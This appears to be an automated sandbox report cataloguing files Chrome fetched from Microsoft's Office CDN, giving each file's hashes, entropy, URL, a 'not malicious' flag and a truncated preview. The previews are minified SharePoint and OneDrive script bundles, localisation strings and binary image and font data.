                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[59],{1131:(e,t,n)=>{n.d(t,{a:()=>i});var a=n("odsp.util_578"),i=new a.qT({name:"ItemLikeRatingDataSource.key",loader:new a.g6(function(){return Promise.all([n.e("deferred.odsp-common"),n.e("deferred.odsp-datasources"),n.e("deferred"),n.e(195)]).then(n.bind(n,1509)).then(function(e){return e.resourceKey})})})}.,1550:(e,t,n)=>{n.d(t,{a:()=>i});var a=n(52);function i(e){if(e.isReadOnly)return!1;if("title"===e.realFieldName.toLocaleLowerCase())return!0;switch(e.type){case a.a.Text:case a.a.Note:case a.a.Boolean:case a.a.Number:case a.a.DateTime:case a.a.Lookup:case a.a.Hyperlink:case a.a.Choice:case a.a.User:case a.a.Image:case a.a.Currency:return!0;case a.a.Thumbnail:default:return!1}}}.,1601:(e,t,n)=>{n.d(t,{a:()=>d});var a=n("tslib_102"),i=n("odsp.util_578"),r=n(1131),o=n(4),s=n(17),c=n(2),d=new i.qT({name:"likeCommand",factory:{dependencies:{pageContext:o.a,getDataSource:r.a.async.lazy,listItemStore:s.a},crea
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (4979)
                              Category:downloaded
                              Size (bytes):14560
                              Entropy (8bit):5.50452456050583
                              Encrypted:false
                              SSDEEP:
                              MD5:F42B451D80C99628E7FB07EDAD731633
                              SHA1:1C2B374368604C15D9012EE3812953670D8DAF42
                              SHA-256:94D1BD8A2ADFDE4B7CF1292DABC57560DB0519BAFCA4868421E7CD4AFAC83983
                              SHA-512:B23ACEA5AC9689ED0E152FC3117632CCBC66A3DBFFABB095140CBF2CE847474EA17EE59E614EC17DD7AC8848CF7EBC9489550F7A8D5B86BC22F957EA1D80BE89
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/@ms/stream-bundle/chunks/53883.js
                              Preview:"use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[53883],{136621:(e,t,n)=>{n.d(t,{DNO:()=>s,_6e:()=>o,mke:()=>i,s5V:()=>r});var a=n(875427);const i=(0,a.k)("PersonVoice20Regular","20",["M15.85 1.15a.5.5 0 0 0-.7.7 6.6 6.6 0 0 1 1.72 4.65 6.6 6.6 0 0 1-1.72 4.65.5.5 0 0 0 .7.7 7.6 7.6 0 0 0 2.03-5.35 7.6 7.6 0 0 0-2.03-5.35Zm-2 2a.5.5 0 0 0-.7.7c.63.64.97 1.62.97 2.65 0 1.03-.34 2.01-.97 2.65a.5.5 0 0 0 .7.7 4.76 4.76 0 0 0 1.28-3.35c0-1.22-.41-2.49-1.28-3.35ZM4 7a4 4 0 1 1 8 0 4 4 0 0 1-8 0Zm4-3a3 3 0 1 0 0 6 3 3 0 0 0 0-6ZM1 14a2 2 0 0 1 2-2h10a2 2 0 0 1 2 2c0 1.7-.83 2.97-2.13 3.8A9.14 9.14 0 0 1 8 19a9.14 9.14 0 0 1-4.87-1.2A4.35 4.35 0 0 1 1 14Zm2-1a1 1 0 0 0-1 1c0 1.3.62 2.28 1.67 2.95A8.16 8.16 0 0 0 8 18c1.74 0 3.26-.36 4.33-1.05A3.36 3.36 0 0 0 14 14a1 1 0 0 0-1-1H3Z"]),r=(0,a.k)("PictureInPictureEnter20Regular","20",["M2 5.75A2.75 2.75 0 0 1 4.75 3h10.5A2.75 2.75 0 0 1 18 5.75V10h-1V5.75C17 4.78 16.22 4 15.25 4H4.75C3.78 4 3 4.78 3
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (864)
                              Category:downloaded
                              Size (bytes):869
                              Entropy (8bit):5.1897204615134465
                              Encrypted:false
                              SSDEEP:
                              MD5:9EE8C4DCA9BF3F377183AC837EE6B00E
                              SHA1:EC5E20EBBB8B4D39A7D32F4C3950919A8AD1532C
                              SHA-256:A42E380FB93687011D2BF3115983C1FD8C4AC409F301DA36D938081669E52352
                              SHA-512:9B6BF15E4252EF86E923C06377AEDE6236D5788AFFE2D78C4AF4AFDC3D9EB9BFE71059ACB3832D0A013B90A9AC59E36082613D9FDDABBCD78AC97F92043999C8
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/odblightspeedwebpack/577.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[577],{4964:function(e,t,n){n.r(t),n.d(t,{LaunchPdfMergeAction:function(){return c}});var a=n("tslib_102"),i=n(23),r=n(14),o=n(2095),s=n(2100),c=function(e){function t(t,n){void 0===n&&(n={});var a=e.call(this,t,n)||this;return a.name="LaunchPdfMergeAction",a._itemSelectionHelper=new(a.child(s.a))({overrideItem:t.item}),a._pdfViewerHelper=t.pdfViewerHelper,a.showHintStar=t.showHintStar,a}return(0,a.XJ)(t,e),t.prototype.onIsAvailable=function(){var e=this._itemSelectionHelper.firstItem();return!!e&&this._pdfViewerHelper.isPdfExtractAvailable(e)&&this._pdfViewerHelper.isPdfEditable(e)},t.prototype.onExecute=function(){return this._pdfViewerHelper.state.filePickerMode("merge"),this.showHintStar.peek()&&this.showHintStar(!1),i.c.wrap({resultType:r.b.Success})},t}(o.a);t.default=c}.}]);
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Unicode text, UTF-8 text, with very long lines (28670)
                              Category:downloaded
                              Size (bytes):36954
                              Entropy (8bit):5.402765309598549
                              Encrypted:false
                              SSDEEP:
                              MD5:44A0532CB766595856885B4BA7CDF450
                              SHA1:FE6B29E4200D6AD510916BD90AD0543EA25C2C85
                              SHA-256:96791860644D264968CE1C5056070E3A0AFF1FE3C65CD7783DC0C63DDFCD9C11
                              SHA-512:0F3A206B600F9FEF2FA6C28AF08138462A5FF68837AB012A81418364A3AF5E2C9FC649F7917905F669CE59D3FC251E4ECAAF72F28F437504DFEAE38B3B6A3CAB
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/168.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[168],{1558:(e,t,n)=>{var a,i;n.d(t,{a:()=>i,b:()=>r,c:()=>a}),function(e){e[e.ThirdParty=0]="ThirdParty",e[e.FirstParty=1]="FirstParty"}(a||(a={})),function(e){e.flow="Flow",e.powerApp="PowerApp"}(i||(i={}));var r={running:0,succeeded:1,userInteractionRequired:2,failed:3,invalid:4}}.,1682:(e,t,n)=>{n.d(t,{a:()=>r});var a=n(1558),i=n(2085);function r(e){switch(null==e?void 0:e.componentType){case a.a.flow:return i.b;case a.a.powerApp:return i.c;default:return i.a}}}.,1499:(e,t,n)=>{n.d(t,{a:()=>i});var a=n("odsp.util_578"),i=new a.qT({name:"ListDataSource.key",loader:new a.g6(function(){return Promise.all([n.e("deferred.odsp-common"),n.e("deferred.odsp-datasources"),n.e("deferred"),n.e("ondemand.resx"),n.e(206)]).then(n.bind(n,1051)).then(function(e){return e.resourceKey})})})}.,816:(e,t,n)=>{n.d(t,{a:()=>c,b:()=>p,c:()=>u,d:()=>m,e:()=>s,f:()=>d,g:()=>l,h:()=>f,i:()=>i.b});var a=n("odsp.util_578"),i=n(47),r=w
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (6303)
                              Category:downloaded
                              Size (bytes):49942
                              Entropy (8bit):4.942955987901986
                              Encrypted:false
                              SSDEEP:
                              MD5:A091239624A9121678C2BDC6EF30ED9C
                              SHA1:AD88D4E14F77912FDF54AAA1C10A2E77F0B5E9B6
                              SHA-256:E062DDBD530D126DC34749EC224FE888D2487EE7049A53A7F536CE38310D58F6
                              SHA-512:E8E58448F4C5B63247BF1C49EB9641FAFC9E2A47F396800AA7284B59250C500B682A7DA2D091FCC6A6B9AE217B5A1A7279B203589D051597EB9D30DB4B1AD3E0
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/freemiumlistshomewebpack/en-us/ondemand.resx.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["ondemand.resx"],{428:e=>{e.exports=JSON.parse('{"a":"EnvironmentType is invalid","b":"Invalid GUID string: \\u0022{0}\\u0022","f":"The value for \\u0022{0}\\u0022 is false","g":"The value for \\u0022{0}\\u0022 must not be null","h":"The value for \\u0022{0}\\u0022 must not be undefined","e":"The value for \\u0022{0}\\u0022 must not be an empty string","d":"The \\u0022{0}\\u0022 object cannot be used because it has been disposed.","c":"Invalid version string: \\u0022{0}\\u0022","j":"Cannot consume services because the scope is not finished yet","k":"Cannot consume services during ServiceScope autocreation","i":"The ServiceScope is already finished","l":"Cannot register service because the scope is already finished","m":"The service key \\u0022{0}\\u0022 has already been registered in this scope","o":"INNERERROR:","n":"CALLSTACK:","p":"LOGPROPERTIES:"}')}.,460:e=>{e.exports=JSON.parse('{"a":"A source with id \
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (1665)
                              Category:downloaded
                              Size (bytes):1670
                              Entropy (8bit):5.154281462038066
                              Encrypted:false
                              SSDEEP:
                              MD5:960A9FDEB372C6BE35A98E60ABB45101
                              SHA1:5FF1CE7077043D99A245AB2D7F56486EC70B231B
                              SHA-256:F855125BB42B32EDEC44F8755C76FB936F12CD6488AA0C832CA8566989BBCF6A
                              SHA-512:7DAFCE4994E96584724CDC496AFA44C91265429F8F8286D5FD37EA6BA4B204FC7F39A7F32BD194D4206C5AE17F6CAF1D42793C79330E46A9C7BD76D08E88187B
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/odblightspeedwebpack/1433.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[1433],{4984:function(e,t,n){n.r(t),n.d(t,{OpenInClipchampAction:function(){return p}});var a=n("tslib_102"),i=n(2095),r=n(97),o=n(2100),s=n(1077),c=n(200),d=n(23),l=n(14),u=n(950),f=n(30),p=function(e){function t(t,n){void 0===t&&(t={}),void 0===n&&(n={});var a=e.call(this,t,n)||this;a.name="OpenInClipchamp";var i=a.resources;a._clientName=a.resources.consume(u.a.optional);var s=n.urlDataSource,d=void 0===s?i.consume(r.bb):s,l=n.itemUrlHelper,p=void 0===l?i.consume(c.h):l;return a._urlDataSource=d,a._itemUrlHelper=p,a.itemSelectionHelper=new(a.child(o.a))({overrideItem:t.item}),a._item=a.itemSelectionHelper.firstItem(),a._url=a.createPureComputed(a._computeUrl),a._pageContext=a.resources.consume(f.a),a}return(0,a.XJ)(t,e),t.prototype.onIsAvailable=function(){return!!this._url()&&(e=(0,s.b)(this._pageContext.canUserUseClipchamp)?!(void 0===this._urlDataSource.getClipchampDriveItemUrl):!(void 0===this._urlDataS
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (13467)
                              Category:downloaded
                              Size (bytes):590483
                              Entropy (8bit):5.431305217419202
                              Encrypted:false
                              SSDEEP:
                              MD5:9A258678117D343B581AD9F3EA84F16A
                              SHA1:398C161836F945191AA4A125BD37FDAD75BBC6D3
                              SHA-256:A7470B651F47CC2DDAB16E21C800288F8846C639EEF382EA509B7DC1A8A88F3F
                              SHA-512:19F52B368CC028DBDCFE5A84DE9FDBFF406A564B439F80AFBF9CEA5DBB12EDB829827C15550CE5BEAE2D61246D5DACA068C002BD6F08ABAF8C7709A023FB994D
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/freemiumlistshomewebpack/freemiumlistshomewebpack.js
                              Preview:var __webpack_result__;(()=>{var e=[(e,t,n)=>{"use strict";n.d(t,{a:()=>c,b:()=>s});var a={};n.r(a),n.d(a,{optionalDiagnostic:()=>r,requiredDiagnostic:()=>i,requiredService:()=>o});var i="requiredDiagnostic",r="optionalDiagnostic",o="requiredService",s=a,c={String:1,Number:2,Boolean:3,Object:4,Array:5,Enum:6}}.,(e,t,n)=>{"use strict";n.d(t,{a:()=>s,b:()=>o.a});var a=n("tslib_102"),i=n(31),r=n(0),o=n(5),s=function(e){function t(){return null!==e&&e.apply(this,arguments)||this}return(0,a.XJ)(t,e),t.prototype.end=function(t){return t&&t.extraData&&this.data.extraData&&(t=(0,a.W_)((0,a.W_)({},t),{extraData:(0,a.W_)((0,a.W_)({},this.data.extraData),t.extraData)})),e.prototype.end.call(this,t)},t}((0,i.a)({eventName:"Qos,",shortEventName:"Qos"},{name:{isKey:!0,isPrefixingDisabled:!0,type:r.a.String},startTimeOverride:{isPrefixingDisabled:!0,type:r.a.Number},resultCode:{isPrefixingDisabled:!0,type:r.a.String},resultType:{typeRef:o.a,isPrefixingDisabled:!0,type:r.a.Enum},error:{isPrefixingDisa
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:PNG image data, 1262 x 952, 8-bit/color RGBA, non-interlaced
                              Category:dropped
                              Size (bytes):118336
                              Entropy (8bit):7.951554910465674
                              Encrypted:false
                              SSDEEP:
                              MD5:915E2001234A42DDC12324F889C20B72
                              SHA1:86B8137D293353679346D196B5BF3A34812AD76C
                              SHA-256:BB9CA2C7390B26B724000DF71013BA5E00DB6E0217757B6EDB47CDBB965CE6EB
                              SHA-512:24FFC4821983EA9F0F05192EF31B377E2566B472C2D523BAE3AB14D6AFB0208C743859D5A6D975F4C6C8CE920C7DC0FB3771D16CE6528552CCF253377AECA164
                              Malicious:false
                              Reputation:unknown
                              Preview:.PNG........IHDR.............e...... cHRM..z&..............u0...`..:....p..Q<....bKGD..............pHYs...%...%.IR$.....tIME......3..m.....IDATx...w|T.7...&.....HH.....]..........}._.m....x....[l..M1.....P...{..4....9's5..........4.s....|.dhxD0.}A.!..B.!..B....G...K....B.!..B.!..B.Q...B.!..B.!../D.;B.!..B.!..B.....!..B.!..B..B..#..B.!..B.!..Q...B.!..B.!../D.;B.!..B.!..B.....!..B.!..B..B..#..B.!..B.!..Q...B.!..B.!../D.;B.!..B.!..B.....!..B.!..B..B..#..B.!..B.!..Q...B.!..B.!../D.;B.!..B.!..B.....!..B.!..B..B..#..B.!..B.!..Q...B.!..B.!../D.;B.!..B.!..B.....!..B.!..B..B..#..B.!..B.!..Q...B.!..B.!../D.;B.!..B.!..B.....!..B.!..B..B..#..B.!..B.!..Q...B.!..B.!../D.;B..A...v.......}..sB.7.*..o...!...B.!..|..`.Z1>>......F..Z..T...t8.0..Z.p:...r.....J.......n...8l6...D".R..V..t....X,..K.R...A"...l6..F..V.V..J..;...t.......j....B.}..a6.a.XD...d2..j5.j.....ht..D".B.........l0.Lp8.....tP(.3(...3...l.6V$...R).r9.J...j.bllL......;.w8.NX,...v...9.L..L..\..B..J..R..L6.w:..X,.X,..l6.
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Unicode text, UTF-8 text, with very long lines (6696)
                              Category:downloaded
                              Size (bytes):630005
                              Entropy (8bit):5.677881774267277
                              Encrypted:false
                              SSDEEP:
                              MD5:3EE18A87B1E36FADCB02CADB1E0938CC
                              SHA1:31721A2DB8CE0F724D2C78640EF1FF1ED4C68728
                              SHA-256:ACBD7D2CC1E5E7E5E0C06CDBB66749797C45E497913B2FD33220D65F1D5A0DED
                              SHA-512:7ACFF5A9EFFD89FC7C476A0F2113B8770C310204866A8B0B4E9EC0DFA83DA6FF7D1DEC67B8E38C9410FADC02765FFC4C95166E445AD1CDD6322635C4482D7D6A
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/file-browser-odb-teams/ja/ondemand.resx.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["ondemand.resx"],{6474:e=>{e.exports=JSON.parse('{"a":"EnvironmentType is invalid","b":"Invalid GUID string: \\u0022{0}\\u0022","f":"The value for \\u0022{0}\\u0022 is false","g":"The value for \\u0022{0}\\u0022 must not be null","h":"The value for \\u0022{0}\\u0022 must not be undefined","e":"The value for \\u0022{0}\\u0022 must not be an empty string","d":"The \\u0022{0}\\u0022 object cannot be used because it has been disposed.","c":"Invalid version string: \\u0022{0}\\u0022","j":"Cannot consume services because the scope is not finished yet","k":"Cannot consume services during ServiceScope autocreation","i":"The ServiceScope is already finished","l":"Cannot register service because the scope is already finished","m":"The service key \\u0022{0}\\u0022 has already been registered in this scope","o":"INNERERROR:","n":"CALLSTACK:","p":"LOGPROPERTIES:"}')}.,7214:e=>{e.exports=JSON.parse('{"a":"A source with id
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Web Open Font Format, TrueType, length 11804, version 1.3277
                              Category:downloaded
                              Size (bytes):11804
                              Entropy (8bit):7.968060056737046
                              Encrypted:false
                              SSDEEP:
                              MD5:7F7DC52DA6EF1E8911D36CC45CD311E9
                              SHA1:A37A6D15058646A551EAFBE6476A922BCA0923F3
                              SHA-256:2BE2B06E4C10F41849BFA90810FBE77AE53725FD20659EE57162685A0DF1F0D1
                              SHA-512:1B885DCD005FC19A1BD145F02BE8E4B249951B1A5168524C041C4603C32BFC725D83959E60C11A5FEEE69531102466DF6BBF1ED8F5BC5EA42A7EBDEF1BB108B8
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/sp-client/odsp-media-75d867e1/fluenthybridfont/odsp-next-icons-15-377fcb8e.woff
                              Preview:wOFF..............S.........................OS/2.......G...`:.q.cmap...P........OmR?gasp................glyf......&...E..5.head..(....5...6#...hhea..)........$....hmtx..)$...\...."..oloca..).............maxp..*L....... ....name..*d.......O..R.post........... ....x.c`a..8...........L..t.!.I.(......@9......VP`p.........`u,......=w.p.x...9.Aa.......W...........7`=....-..D+Z.1<...#o.tNr..+....]11t.#./.=b.Y..."..T.2.8.L1.........:.l...{.s.!G.X.....}l.y..m...e)......8*.r.'.x`...lq..W.0.....Lq~..m../.?...l].............x..{.xT......6..d2.$3.K.L...$..$...(...."*b.E...."(XA..+*.R...>.z+u..Uk..R...._.}..v..vI2.d..;.L&...<].9....~....p.[..w...OdB.......pG&./..q.....w.u......hd#..$..r).=..\...q.G[/........m..,.uv..(.b]/..)K..^.YMe.......nK@w...~8...I..H..[G..0E.....k#*.oj.......X..,.T%.L....$...*..+BM..!..V5..(.....e.u7..O3....KEj.OkG..b...qz+....#..[.o1w{U./$...?.g.J..>..bU..-x.7.DD.x....%..fr.Q.oe...p../.......d...t.I.J.../...^>.*x.R1[....::U.....'..?..>~./...
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (4743)
                              Category:downloaded
                              Size (bytes):8206
                              Entropy (8bit):5.331703560908857
                              Encrypted:false
                              SSDEEP:
                              MD5:4CD597D84E050DC42D9EE3446EE18992
                              SHA1:3ABC7D8C0D8F5E9D4773AEBE65619C4A877F338F
                              SHA-256:FA5387054F2CD3F309E849636E1663EBF1E2572CA699EF6794B6DB4AB6D29DED
                              SHA-512:E59EA641CA637D10EDB0053A091B1193B676BCE037CE117ADC5BA09C22DB65E508EEF03A047230935E4F0CD1DBD3EAEA4AF374B07EFA83B5D7F37EF275532974
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/file-browser-spo-teams-lists/50.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[50],{78:(e,t,n)=>{n.d(t,{a:()=>i});var a=n(70);const i=function(){function e(t,n){void 0===n&&(n=a.a.none),e.init(),this.dataStoreKey=t,this.defaultCachingType=n,n===a.a.none?this.dataStore={}:(void 0===e._dataStore[this.dataStoreKey]&&(e._dataStore[this.dataStoreKey]={}),this.dataStore=e._dataStore[this.dataStoreKey])}return e.hasStorageType=function(t){switch(e.init(),t){case a.a.none:case a.a.sharedMemory:return!0;case a.a.session:return!!e._sessionStorage;case a.a.local:return!!e._localStorage;default:return!1}},e.init=function(){if(!e._initialized){try{"localStorage"in window&&window.localStorage&&e.testStorage(window.localStorage)&&(e._localStorage=window.localStorage)}catch(e){}try{"sessionStorage"in window&&window.sessionStorage&&e.testStorage(window.sessionStorage)&&(e._sessionStorage=window.sessionStorage)}catch(e){}null==e._localStorage&&(e._localStorage=e._sessionStorage),e._initialized=!0}},e.tes
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Web Open Font Format, TrueType, length 24932, version 1.3277
                              Category:downloaded
                              Size (bytes):24932
                              Entropy (8bit):7.985902183463468
                              Encrypted:false
                              SSDEEP:
                              MD5:2F7CF2FB2DB1ECBC5A871C3A40F2F0A7
                              SHA1:0ACA92B1ADB0C9423B53F32709C4A812BE3E27EE
                              SHA-256:FDA51B3B2B23E4C0CD8E25CF791A4DEB387881D29096E3B7E98754A7C0E06950
                              SHA-512:803E8751064FCA8DD14A93B5956B48513E0BA1AF34CDCDB8EC98205DDAC3732141BA17294CF46A54BAE43DD6B53F2713892DFD215FA00E10132AE9DC26B53BC1
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/sp-client/odsp-media-75d867e1/fluenthybridfont/odsp-next-icons-629362cb.woff
                              Preview:wOFF......ad................................OS/2.......G...`+Cw.cmap...P...o.....T..gasp................glyf......VO......head..[....5...6#.hhea..[T.......$....hmtx..[t.......z0.$.loca..\....x...x...\maxp..]........ ....name..]........O..R.post..aP....... ....x.c`a..8...........L..t.!.I.(......@9......VP`px..c....!...X <....N....x...]l.U...Y...:.3;;s..&-......Bb...T4.6.......X..+B. ..&JK!BL.h...mjM1Z.......5.B..;gvfgw..m......\..r.|'.=W'...q\.wi..'wrs..g...r.'.+.\8.Hl.x.7..o.=............".@.?(....t.B....Ja!....V@.....Ax..`..`;...@.tC?..0$...i........}...]...OO.S....QjP.....0/....Y%[.....5..l......;o.&2.......L..........u....iuY.Y....9.....j.n.f.....a....hL4%.'F...z.1........].n.U'.;..$...,Iv&.'O.JR.......s..k..n......n.5......&.fJ3.2..L4..z.e.ls6.m.>...df..b5Wp...........})..W^v..O.=..~.....}y.......n.$...{.U./.u......l.....L........7..,......B..f<N..M6...H..&.d#..<..Z.5....#d.."......hx?..{....ux.~...9.FI.E.Q.Y....B(....<..D..~T..... ...i
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Unicode text, UTF-8 text, with very long lines (3890)
                              Category:downloaded
                              Size (bytes):8248
                              Entropy (8bit):5.044807137946421
                              Encrypted:false
                              SSDEEP:
                              MD5:DB59ADCB7B49E88278574D09E318175F
                              SHA1:22FBBCF23315C837B924DD7C635C60ECD96AAD7F
                              SHA-256:94763CA8AA88CB529FCFC50AE7EBCBDBE2C7ADE92A037E255064EEFFAB97E3B6
                              SHA-512:BD21AB242323ADCEC14EE9126EE274E075D2D8FBDC43C426BF37AF56F247AF1B4D3CC2D860A56D9D74FB1B41D5EDE878C6EB55963BC76965CDAF8BD517D819F4
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/freemiumlistshomewebpack/en-gb/initial.resx.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["initial.resx"],{50:e=>{e.exports=JSON.parse('{"b":"Only available when online","a":"{0}. Disabled while offline"}')}.,184:e=>{e.exports=JSON.parse('{"t":"Dark red","u":"Red","v":"Orange","w":"Green","x":"Dark green","y":"Teal","z":"Blue","A":"Navy blue","B":"Blue purple","C":"Dark blue","D":"Lavender","E":"Pink","o":"Rocket","n":"Robot","e":"Bug","a":"Aeroplane","f":"Calendar","s":"Target","g":"Clipboard","i":"Colour palette","l":"Lightbulb","j":"Cube","c":"Beaker","p":"Piggy bank","r":"Playlist","k":"Hospital","b":"Bank","m":"Map pin","h":"Coffee cup","q":"Shopping cart","d":"Birthday cake"}')}.,186:e=>{e.exports=JSON.parse('{"RelativeDateTime_AFewSeconds":"A few seconds ago","RelativeDateTime_AFewSeconds_StartWithLowerCase":"a few seconds ago","RelativeDateTime_AFewSecondsFuture":"In a few seconds","RelativeDateTime_AFewSecondsFuture_StartWithLowerCase":"in a few seconds","RelativeDateTime_AboutAMinuteFutu
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Unicode text, UTF-8 text, with very long lines (13295)
                              Category:downloaded
                              Size (bytes):654531
                              Entropy (8bit):5.084802593259654
                              Encrypted:false
                              SSDEEP:
                              MD5:7AF557F74E217D72D2021A68564ED708
                              SHA1:256D35141F13D26E9944D80D0C73A302BDE18739
                              SHA-256:A02B2AF8EC578EC506030AF8BCF4FAC52A5263266A4AB0CE86E12853AF02F526
                              SHA-512:DD2C3CB0D12186348128A3A1D3A109360A8EB669FA87AE318A644019B48A7B448DCF79A0D4F857FAB023F2D9277486B0B67CD3A08C70E3FB4595F73D479CE261
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/metaosfilebrowser/de/ondemand.resx.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["ondemand.resx"],{5223:e=>{e.exports=JSON.parse('{"a":"EnvironmentType is invalid","b":"Invalid GUID string: \\u0022{0}\\u0022","f":"The value for \\u0022{0}\\u0022 is false","g":"The value for \\u0022{0}\\u0022 must not be null","h":"The value for \\u0022{0}\\u0022 must not be undefined","e":"The value for \\u0022{0}\\u0022 must not be an empty string","d":"The \\u0022{0}\\u0022 object cannot be used because it has been disposed.","c":"Invalid version string: \\u0022{0}\\u0022","j":"Cannot consume services because the scope is not finished yet","k":"Cannot consume services during ServiceScope autocreation","i":"The ServiceScope is already finished","l":"Cannot register service because the scope is already finished","m":"The service key \\u0022{0}\\u0022 has already been registered in this scope","o":"INNERERROR:","n":"CALLSTACK:","p":"LOGPROPERTIES:"}')}.,5968:e=>{e.exports=JSON.parse('{"a":"A source with id
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (24062)
                              Category:downloaded
                              Size (bytes):51626
                              Entropy (8bit):5.311147680942626
                              Encrypted:false
                              SSDEEP:
                              MD5:ABFE85F9119E94C2E009CD9EB482FA8E
                              SHA1:D8A6F6909719AE5D2ABE539019D22B996B0646C7
                              SHA-256:8BFCEDDC40ABA1512D19B6CF0FFAF345DCB24319C733D8022CE35688631469E9
                              SHA-512:0A774757CBADF42C6F1C2B8C5A105EC2301C136402FBD56377400B58592870A0BC12C591E968BC9F8973D59D76031905ED21B935EC54620B2CE0853872A746B3
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/69.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[69,81,105,78],{829:(e,t,n)=>{n.d(t,{a:()=>r,b:()=>c,c:()=>s,d:()=>o});var a=n(484),i=new Map,r=function(){function e(e){this.debugName=e;var t=this.id=(0,a.a)(e);i.set(t,this)}return e.get=function(e){if(!e)throw new Error("Unable to determine the Facet for an empty or undefined id.");var t=i.get(e);if(!t)throw new Error("Unable to determine the Facet for id '".concat(e,"'. ")+"Only store objects into a facet collection that have been created using the pack function. This error will typically occur if multiple versions of the @ms/items-view package have been bundled into the application.");return t},e.prototype.unpack=function(e){var t=JSON.stringify(this.id);return this.unpack=new Function("t","return t[".concat(t,"]")),this.unpack(e)},e.prototype.pack=function(e){var t=JSON.stringify(this.id);return this.pack=new Function("v","return { ".concat(t,": v }")),this.pack(e)},e}();function o(e,t){var n={};for(var
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Unicode text, UTF-8 text, with very long lines (12746)
                              Category:downloaded
                              Size (bytes):671044
                              Entropy (8bit):5.084359915879978
                              Encrypted:false
                              SSDEEP:
                              MD5:B65E6D84F8492B30E83B677D71854C51
                              SHA1:7613708571D04C5A245BDB37BC17216FD52DBFBF
                              SHA-256:8E96BDDABE791169E0F3DDB1F6395C1000E9B688186674FE529DE4128A82498D
                              SHA-512:86D16553E92406E5BC8FF31710FF995CC364AF83C1CEAA9F137074967B24CA4929D541EF4514B8BFD79BB4107A8AD7085A66C8CA55341469BB7D4C1596F87419
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/metaosfilebrowser/fr/ondemand.resx.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["ondemand.resx"],{5223:e=>{e.exports=JSON.parse('{"a":"EnvironmentType is invalid","b":"Invalid GUID string: \\u0022{0}\\u0022","f":"The value for \\u0022{0}\\u0022 is false","g":"The value for \\u0022{0}\\u0022 must not be null","h":"The value for \\u0022{0}\\u0022 must not be undefined","e":"The value for \\u0022{0}\\u0022 must not be an empty string","d":"The \\u0022{0}\\u0022 object cannot be used because it has been disposed.","c":"Invalid version string: \\u0022{0}\\u0022","j":"Cannot consume services because the scope is not finished yet","k":"Cannot consume services during ServiceScope autocreation","i":"The ServiceScope is already finished","l":"Cannot register service because the scope is already finished","m":"The service key \\u0022{0}\\u0022 has already been registered in this scope","o":"INNERERROR:","n":"CALLSTACK:","p":"LOGPROPERTIES:"}')}.,5968:e=>{e.exports=JSON.parse('{"a":"A source with id
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (64119)
                              Category:downloaded
                              Size (bytes):134212
                              Entropy (8bit):5.229118980465327
                              Encrypted:false
                              SSDEEP:
